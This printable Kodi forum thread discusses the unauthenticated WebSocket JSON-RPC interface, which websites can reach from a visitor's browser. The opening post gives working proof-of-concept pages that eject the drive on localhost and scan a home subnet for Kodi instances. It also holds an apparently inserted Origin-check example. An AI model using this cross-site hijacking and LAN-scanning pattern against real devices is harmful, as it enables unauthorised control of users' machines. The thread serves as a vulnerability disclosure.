Kodi Community Forum
Security, websockets & JSON-RPC - Printable Version

+---- Thread: Security, websockets & JSON-RPC (/showthread.php?tid=151926)



Security, websockets & JSON-RPC - ThePickler - 2013-01-13

I was a bit surprised by the lack of security features implemented in relation to WebSockets and JSON-RPC; it seems almost too easy to booby-trap a website.

Example:

Code:
<html>
<script language="javascript" type="text/javascript">
  var websocket = new WebSocket('ws://127.0.0.1:9090/jsonrpc');
  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };
</script>
</html>

Or, if there's a media center with remote access enabled, let's scan the network.

Code:
<html>
<script language="javascript" type="text/javascript">
var local_ips = '192.168.0.';
function tryport(i) {
  console.log('trying ' + i)
  var websocket = new WebSocket('ws://' + local_ips + i + ':9090/jsonrpc');
  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };
}

for (var i=1; i<256; i++) {
  tryport(i);
};
</script>
</html>

Tested with Windows and Frodo RC3.
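The handshake check a defender would want against the cross-site connection shown above is Origin validation: a browser always attaches an Origin header to a WebSocket upgrade, so a server that only expects its own web UI as a browser client can refuse everything else. The following is an added illustration, not Kodi code; the allowed origins, the /jsonrpc target and the sample handshake are constructed assumptions, and the check does not replace a password for non-browser clients.

```javascript
// Added example (not Kodi's code): gate a WebSocket upgrade on its Origin header.
// Assumed: the media center's own web UI is served from port 8080 on the same host.
const ALLOWED_ORIGINS = new Set([
  'http://127.0.0.1:8080',
  'http://localhost:8080',
]);

// Parse a raw HTTP upgrade request into { method, target, headers } (header names lowercased).
function parseHandshake(raw) {
  const [requestLine, ...headerLines] = raw.split('\r\n').filter(Boolean);
  const [method, target] = requestLine.split(' ');
  const headers = {};
  for (const line of headerLines) {
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { method, target, headers };
}

// Decide whether to complete the handshake. Returns { accept, reason }.
function checkUpgrade(raw, allowedOrigins = ALLOWED_ORIGINS) {
  const { method, target, headers } = parseHandshake(raw);
  if (method !== 'GET' || target !== '/jsonrpc') return { accept: false, reason: 'bad target' };
  if ((headers['upgrade'] || '').toLowerCase() !== 'websocket') {
    return { accept: false, reason: 'not a websocket upgrade' };
  }
  const origin = headers['origin'];
  // A non-browser client (remote app, script) may omit Origin; a browser cannot.
  // Accepting it here is a policy choice: those clients still need the password.
  if (origin === undefined) return { accept: true, reason: 'no Origin: non-browser client' };
  if (!allowedOrigins.has(origin)) return { accept: false, reason: `origin ${origin} not allowed` };
  return { accept: true, reason: 'origin allowed' };
}

// Constructed handshake resembling what the booby-trapped page above would make the browser send.
const CROSS_SITE_HANDSHAKE = [
  'GET /jsonrpc HTTP/1.1', 'Host: 127.0.0.1:9090', 'Upgrade: websocket',
  'Connection: Upgrade', 'Origin: http://evil.example', 'Sec-WebSocket-Version: 13', '',
].join('\r\n');

// Same handshake as the media center's own web UI would send (constructed).
const SAME_HOST_HANDSHAKE = CROSS_SITE_HANDSHAKE
  .replace('Origin: http://evil.example', 'Origin: http://127.0.0.1:8080');

console.log(checkUpgrade(CROSS_SITE_HANDSHAKE)); // { accept: false, reason: 'origin http://evil.example not allowed' }
console.log(checkUpgrade(SAME_HOST_HANDSHAKE));  // { accept: true, reason: 'origin allowed' }
```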


RE: Security, websockets & JSON-RPC - Mizaki - 2013-01-13

I expect the answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.


RE: Security, websockets & JSON-RPC - Montellese - 2013-01-13

(2013-01-13, 17:02)Mizaki Wrote: I expect the answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.

What he said. If you don't trust the people in your network, don't enable remote access. It's not only the websocket interface which has this lack of security; the TCP server is the same, and if you don't set a password on the webserver, HTTP access is the same.


RE: Security, websockets & JSON-RPC - amanda91 - 2024-03-08

Implementing robust security measures is crucial when integrating websockets and JSON-RPC. Employing encryption protocols, secure authentication mechanisms, and regularly updating software can fortify the system against potential vulnerabilities. Prioritizing security ensures the reliability and confidentiality of communication, fostering a resilient websockets and JSON-RPC environment.


RE: Security, websockets & JSON-RPC - jbinkley60 - 2024-03-09

This has to be close to a new record, responding to an 11+ year old post.


Jeff


RE: Security, websockets & JSON-RPC - selfcontained - 2024-03-10

Even if it reads a bit "AI-ish".


RE: Security, websockets & JSON-RPC - jbinkley60 - 2024-03-10

(2024-03-10, 15:34)selfcontained Wrote: Even if it reads a bit "AI-ish".

Indeed. My thought exactly.

Jeff